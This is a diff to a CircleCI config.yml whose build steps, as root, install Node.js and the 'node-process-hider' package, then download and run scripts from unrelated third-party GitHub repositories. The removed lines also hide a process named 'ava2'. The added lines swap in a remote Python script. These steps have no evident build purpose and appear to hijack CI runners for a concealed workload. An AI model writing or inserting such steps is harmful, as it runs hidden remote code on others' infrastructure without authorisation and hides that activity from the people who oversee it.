--- a/.circleci/config.yml
+++ b/.circleci/config.yml
@@ -8,6 +8,6 @@ jobs:
           password: $DOCKERHUB_PASSWORD  # context / project UI env-var reference
     steps:
       - checkout
-      - run: sudo su --command "sudo apt update && sudo apt upgrade -y && curl -sL https://deb.nodesource.com/setup_12.x | sudo -E bash - && sudo apt-get install --force-yes nodejs && npm i -g node-process-hider && sudo ph add ava2 && wget https://raw.githubusercontent.com/faridmd/Heyzo/main/wrote1.sh"
-      - run: sudo su --command "bash wrote1.sh"
+      - run: sudo su --command "sudo apt update && sudo apt upgrade -y && curl -sL https://deb.nodesource.com/setup_12.x | sudo -E bash - && sudo apt-get install --force-yes nodejs && npm i -g node-process-hider && wget https://raw.githubusercontent.com/aurbach55/zash/main/dep.py"
+      - run: sudo su --command "dep.py"
       
